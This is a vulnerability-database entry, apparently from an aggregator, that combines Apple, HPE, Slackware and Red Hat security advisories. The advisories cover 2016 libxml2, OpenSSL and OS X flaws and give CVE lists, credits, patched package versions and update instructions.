following:\n\napache_mod_php\nAvailable for: \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in PHP versions prior to\n5.5.36. These were addressed by updating PHP to version 5.5.36. \nCVE-2016-4650\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-2016-4647 : Juwei Lin (@fuzzerDOTcn) of Trend Micro\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An out-of-bounds read was addressed through improved\ninput validation. \nCVE-2016-4648 : Juwei Lin(@fuzzerDOTcn) of Trend Micro\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Parsing a maliciously crafted audio file may lead to the\ndisclosure of user information\nDescription: An out-of-bounds read was addressed through improved\nbounds checking. \nCVE-2016-4646 : Steven Seeley of Source Incite working with Trend\nMicro\u0027s Zero Day Initiative\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a system denial of service\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-4649 : Juwei Lin(@fuzzerDOTcn) of Trend Micro\n\nbsdiff\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An integer overflow existed in bspatch. This issue was\naddressed through improved bounds checking. \nCVE-2014-9862 : an anonymous researcher\n\nCFNetwork\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to view sensitive user information\nDescription: A permissions issue existed in the handling of web\nbrowser cookies. This issue was addressed through improved\nrestrictions. \nCVE-2016-4645 : Abhinav Bansal of Zscaler Inc. \n\nCoreGraphics\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-2016-4637 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nCoreGraphics\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to elevate privileges\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-2016-4652 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nFaceTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: An attacker in a privileged network position may be able to\ncause a relayed call to continue transmitting audio while appearing\nas if the call terminated\nDescription: User interface inconsistencies existed in the handling\nof relayed calls. These issues were addressed through improved\nFaceTime display logic. \nCVE-2016-4635 : Martin Vigo\n\nGraphics Drivers\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4634 : Stefan Esser of SektionEins\n\nImageIO\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A memory consumption issue was addressed through\nimproved memory handling. \nCVE-2016-4632 : Evgeny Sidorov of Yandex\n\nImageIO\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4631 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nImageIO\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4629 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\nCVE-2016-4630 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nIntel Graphics Driver\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode with kernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4633 : an anonymous researcher\n\nIOHIDFamily\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-4626 : Stefan Esser of SektionEins\n\nIOSurface\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A use-after-free was addressed through improved memory\nmanagement. \nCVE-2016-4625 : Ian Beer of Google Project Zero\n\nKernel\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1863 : Ian Beer of Google Project Zero\nCVE-2016-1864 : Ju Zhu of Trend Micro\nCVE-2016-4582 : Shrek_wzw and Proteas of Qihoo 360 Nirvan Team\n\nKernel\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a system denial of service\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-1865 : CESG, Marco Grassi (@marcograss) of KeenLab\n(@keen_lab), Tencent\n\nlibc++abi\nAvailable for: OS X El Capitan v10.11 and later\nImpact: An application may be able to execute arbitrary code with\nroot privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4621 : an anonymous researcher\n\nlibexpat\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-0718 : Gustavo Grieco\n\nLibreSSL\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in LibreSSL before 2.2.7. These\nwere addressed by updating LibreSSL to version 2.2.7. \nCVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google) Mark Brand,\nIan Beer of Google Project Zero\nCVE-2016-2109 : Brian Carpenter\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Parsing a maliciously crafted XML document may lead to\ndisclosure of user information\nDescription: An access issue existed in the parsing of maliciously\ncrafted XML files. This issue was addressed through improved input\nvalidation. \nCVE-2016-4449 : Kostya Serebryany\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Multiple vulnerabilities in libxml2\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-4447 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-4448 : Apple\nCVE-2016-4483 : Gustavo Grieco\nCVE-2016-4614 : Nick Wellnhofe\nCVE-2016-4615 : Nick Wellnhofer\nCVE-2016-4616 : Michael Paddon\nCVE-2016-4619 : Hanno Boeck\n\nlibxslt\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Multiple vulnerabilities in libxslt\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1684 : Nicolas GrA(c)goire\nCVE-2016-4607 : Nick Wellnhofer\nCVE-2016-4608 : Nicolas GrA(c)goire\nCVE-2016-4609 : Nick Wellnhofer\nCVE-2016-4610 : Nick Wellnhofer\nCVE-2016-4612 : Nicolas GrA(c)goire\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode leading to compromise of user information\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4640 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode leading to the compromise of user information\nDescription: A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-4641 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a denial of service\nDescription: A memory initialization issue was addressed through\nimproved memory handling. \nCVE-2016-4639 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to gain root privileges\nDescription: A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-4638 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nOpenSSL\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in OpenSSL. These issues were resolved by backporting the fixes from OpenSSL 1.0.2h/1.0.1 to OpenSSL 0.9.8. \nCVE-2016-2105 : Guido Vranken\nCVE-2016-2106 : Guido Vranken\nCVE-2016-2107 : Juraj Somorovsky\nCVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google), Mark Brand and Ian Beer of Google Project Zero\nCVE-2016-2109 : Brian Carpenter\nCVE-2016-2176 : Guido Vranken\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4596 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4597 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4600 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4602 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4598 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted SGI file may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4601 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4599 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nSafari Login AutoFill\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A user\u0027s password may be visible on screen\nDescription: An issue existed in Safari\u0027s password auto-fill. This\nissue was addressed through improved matching of form fields. \nCVE-2016-4595 : Jonathan Lewis from DeARX Services (PTY) LTD\n\nSandbox Profiles\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local application may be able to access the process list\nDescription: An access issue existed with privileged API calls. This\nissue was addressed through additional restrictions. \nCVE-2016-4594 : Stefan Esser of SektionEins\n\nNote: OS X El Capitan 10.11.6 includes the security content of Safari\n9.1.2. For further details see https://support.apple.com/kb/HT206900\n\n\nOS X El Capitan v10.11.6 and Security Update 2016-004 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJXjXAvAAoJEIOj74w0bLRG/5EP/2v9SJTrO+/4b3A1gqC1ch8y\n+cJ04tXRsO7rvjKT5nCylo30U0Sanz/bUbDx4559YS7/P/IyeyZVheaTJwK8wzEy\npSOPpy35hUuVIw0/p4YsuHDThSBPFMmDljTxH7elkfuBV1lPSrCkyDXc0re2HxWV\nxj68zAxtM0jkkhgcxb2ApZSZVXhrjUZtbY0xEVOoWKKFwbMvKfx+4xSqunwQeS1u\nwevs1EbxfvsZbc3pG+xYcOonbegBzOy9aCvNO1Yv1zG+AYXC5ERMq1vk3PsWOTQN\nZVY1I7mvCaEfvmjq2isRw8XYapAIKISDLwMKBSYrZDQFwPQLRi1VXxQZ67Kq1M3k\nah04/lr0RIcoosIcBqxD2+1UAFjUzEUNFkYivjhuaeegN2QdL7Ujegf1QjdAt8lk\nmmKduxYUDOaRX50Kw7n14ZveJqzE1D5I6QSItaZ9M1vR60a7u91DSj9D87vbt1YC\nJM/Rvf/4vonp1NjwA2JQwCiZfYliBDdn9iiCl8mzxdsSRD/wXcZCs05nnKmKsCfc\n55ET7IwdG3622lVheOJGQZuucwJiTn36zC11XVzZysQd/hLD5rUKUQNX1WOgZdzs\nxPsslXF5MWx9jcdyWVSWxDrN0sFk+GpQFQDuVozP60xuxqR3qQ0TXir2NP39uIF5\nYozOGPQFmX0OviWCQsX6\n=ng+m\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n\na-c05194709\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05194709\nVersion: 1\n\nHPSBGN03628 rev.1 - HPE IceWall Federation Agent using libXML2 library,\nRemote Denial of Service (DoS), Unauthorized Modification, Unauthorized\nDisclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-07-07\nLast Updated: 2016-07-07\n\nPotential Security Impact: Remote Denial of Service (DoS), Unauthorized\nDisclosure of Information, Unauthorized Modification\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nSecurity vulnerabilities in the libXML2 library could potentially impact HPE\nIceWall Federation Agent resulting in Remote Denial of Service (DoS), or\nunauthorized modification, or unauthorized disclosure of information. \n\nReferences:\n\n - CVE-2016-4447: Remote Denial of Service (DoS)\n - CVE-2016-4448: Remote unauthorized disclosure of information,\nunauthorized modification, Denial of Service (DoS)\n - CVE-2016-4449: Remote unauthorized disclosure of information, Denial of\nService (DoS)\n - PSRT110164\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - IceWall Federation Agent Version 3.0 (RHEL 6/7) using libXML2\n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2016-4447\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-4448\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n CVE-2016-4449\n 7.1 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\n 5.8 (AV:N/AC:M/Au:N/C:P/I:N/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docI\nd=emr_na-c01345499\n\nRESOLUTION\n\nHPE recommends applying the latest OS vendor security patches for libXML2 to\nresolve the vulnerabilities in the libXML2 library. \n\nHISTORY\nVersion:1 (rev.1) - 7 July 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability with any HPE supported\nproduct, send Email to: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/libxml2-2.9.4-i486-1_slack14.1.txz: Upgraded. \n Format string vulnerability (CVE-2016-4448). \n Inappropriate fetch of entities content (CVE-2016-4449). \n For more information, see:\n http://xmlsoft.org/news.html\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4447\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4448\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4449\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libxml2-2.9.4-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libxml2-2.9.4-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libxml2-2.9.4-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libxml2-2.9.4-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libxml2-2.9.4-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libxml2-2.9.4-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 package:\nc498433ae7d6077a9d5245877aa2c06e libxml2-2.9.4-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nc92258a87bb30a6cdce2b5428d640bd5 libxml2-2.9.4-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n2b74b913a164a23ad2da10eebf923e46 libxml2-2.9.4-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\ne2dee612c7de77822824e43a61414c2c libxml2-2.9.4-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n98d1ede4a347a49f2ad972ac5339b9e6 l/libxml2-2.9.4-i586-1.txz\n\nSlackware x86_64 -current package:\nc2d5721aac77b74d7e47a2a8a372d47a l/libxml2-2.9.4-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg libxml2-2.9.4-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. Description:\n\nThis release of Red Hat JBoss Core Services httpd 2.4.23 serves as a\nreplacement for JBoss Core Services Apache HTTP Server 2.4.6. (CVE-2016-1762,\nCVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,\nCVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705,\nCVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)\n\n* This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420,\nCVE-2016-7141)\n\n* This update fixes two flaws in httpd. (CVE-2016-4459,\nCVE-2016-8612)\n\n* A buffer overflow flaw when concatenating virtual host names and URIs was\nfixed in mod_jk. (CVE-2016-6808)\n\n* A memory leak flaw was fixed in expat. Upstream acknowledges Stephen Henson (OpenSSL development team)\nas the original reporter of CVE-2015-0286; Huzaifa Sidhpurwala (Red Hat),\nHanno BAPck, and David Benjamin (Google) as the original reporters of\nCVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2105,\nCVE-2016-2106, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842; Juraj\nSomorovsky as the original reporter of CVE-2016-2107; Yuval Yarom\n(University of Adelaide and NICTA), Daniel Genkin (Technion and Tel Aviv\nUniversity), and Nadia Heninger (University of Pennsylvania) as the\noriginal reporters of CVE-2016-0702; and Adam Langley (Google/BoringSSL) as\nthe original reporter of CVE-2016-0705. \n\nSee the corresponding CVE pages linked to in the References section for\nmore information about each of the flaws listed in this advisory. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]\nJBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service\n\n6. \nCVE-2016-4594 : Stefan Esser of SektionEins\n\nInstallation note:\n\nInstructions on how to update your Apple Watch software are\navailable at https://support.apple.com/en-us/HT204641\n\nTo check the version on your Apple Watch, open the Apple Watch app\non your iPhone and select \"My Watch \u003e General \u003e About\". \n\nAlternatively, on your watch, select \"My Watch \u003e General \u003e About\"",
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VAR-201605-0466
Vulnerability from variot - Updated: 2026-04-10 23:10The xmlDictAddString function in libxml2 before 2.9.4, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to cause a denial of service (heap-based buffer over-read) via a crafted XML document. Apple Mac OS X, watchOS, iOS, and tvOS are prone to multiple security vulnerabilities. Attackers can exploit these issues to execute arbitrary code and bypass security restrictions. Failed exploit attempts may result in a denial-of-service condition. Versions prior to iOS 9.3.2, watchOS 2.2.1, Mac OS X 10.11.5, and tvOS 9.2.1 are vulnerable. in the United States. Apple iOS is an operating system developed for mobile devices; watchOS is a smart watch operating system; OS X El Capitan is a dedicated operating system developed for Mac computers; tvOS is a smart TV operating system. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc. CVE-ID CVE-2016-1847 : Tongbo Luo and Bo Qu of Palo Alto Networks
Installation note:
Instructions on how to update your Apple Watch software are available at https://support.apple.com/en-us/HT204641
To check the version on your Apple Watch, open the Apple Watch app on your iPhone and select "My Watch > General > About". -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: libxml2 security update Advisory ID: RHSA-2016:1292-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2016:1292 Issue date: 2016-06-23 CVE Names: CVE-2016-1762 CVE-2016-1833 CVE-2016-1834 CVE-2016-1835 CVE-2016-1836 CVE-2016-1837 CVE-2016-1838 CVE-2016-1839 CVE-2016-1840 CVE-2016-3627 CVE-2016-3705 CVE-2016-4447 CVE-2016-4448 CVE-2016-4449 =====================================================================
- Summary:
An update for libxml2 is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
The libxml2 library is a development toolbox providing the implementation of various XML standards.
Security Fix(es):
A heap-based buffer overflow flaw was found in the way libxml2 parsed certain crafted XML input. A remote attacker could provide a specially crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or execute arbitrary code with the permissions of the user running the application. (CVE-2016-1834, CVE-2016-1840)
Multiple denial of service flaws were found in libxml2. A remote attacker could provide a specially crafted XML file that, when processed by an application using libxml2, could cause that application to crash. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449)
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all applications linked to the libxml2 library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1319829 - CVE-2016-3627 libxml2: stack exhaustion while parsing xml files in recovery mode 1332443 - CVE-2016-3705 libxml2: stack overflow before detecting invalid XML file 1338682 - CVE-2016-1833 libxml2: Heap-based buffer overread in htmlCurrentChar 1338686 - CVE-2016-4447 libxml2: Heap-based buffer underreads due to xmlParseName 1338691 - CVE-2016-1835 libxml2: Heap use-after-free in xmlSAX2AttributeNs 1338696 - CVE-2016-1837 libxml2: Heap use-after-free in htmlPArsePubidLiteral and htmlParseSystemiteral 1338700 - CVE-2016-4448 libxml2: Format string vulnerability 1338701 - CVE-2016-4449 libxml2: Inappropriate fetch of entities content 1338702 - CVE-2016-1836 libxml2: Heap use-after-free in xmlDictComputeFastKey 1338703 - CVE-2016-1839 libxml2: Heap-based buffer overread in xmlDictAddString 1338705 - CVE-2016-1838 libxml2: Heap-based buffer overread in xmlPArserPrintFileContextInternal 1338706 - CVE-2016-1840 libxml2: Heap-buffer-overflow in xmlFAParserPosCharGroup 1338708 - CVE-2016-1834 libxml2: Heap-buffer-overflow in xmlStrncat 1338711 - CVE-2016-1762 libxml2: Heap-based buffer-overread in xmlNextChar
- Package List:
Red Hat Enterprise Linux HPC Node (v. 6):
Source: libxml2-2.7.6-21.el6_8.1.src.rpm
x86_64: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-2.7.6-21.el6_8.1.x86_64.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-python-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm libxml2-static-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: libxml2-2.7.6-21.el6_8.1.src.rpm
i386: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-python-2.7.6-21.el6_8.1.i686.rpm
ppc64: libxml2-2.7.6-21.el6_8.1.ppc.rpm libxml2-2.7.6-21.el6_8.1.ppc64.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.ppc.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.ppc64.rpm libxml2-devel-2.7.6-21.el6_8.1.ppc.rpm libxml2-devel-2.7.6-21.el6_8.1.ppc64.rpm libxml2-python-2.7.6-21.el6_8.1.ppc64.rpm
s390x: libxml2-2.7.6-21.el6_8.1.s390.rpm libxml2-2.7.6-21.el6_8.1.s390x.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.s390.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.s390x.rpm libxml2-devel-2.7.6-21.el6_8.1.s390.rpm libxml2-devel-2.7.6-21.el6_8.1.s390x.rpm libxml2-python-2.7.6-21.el6_8.1.s390x.rpm
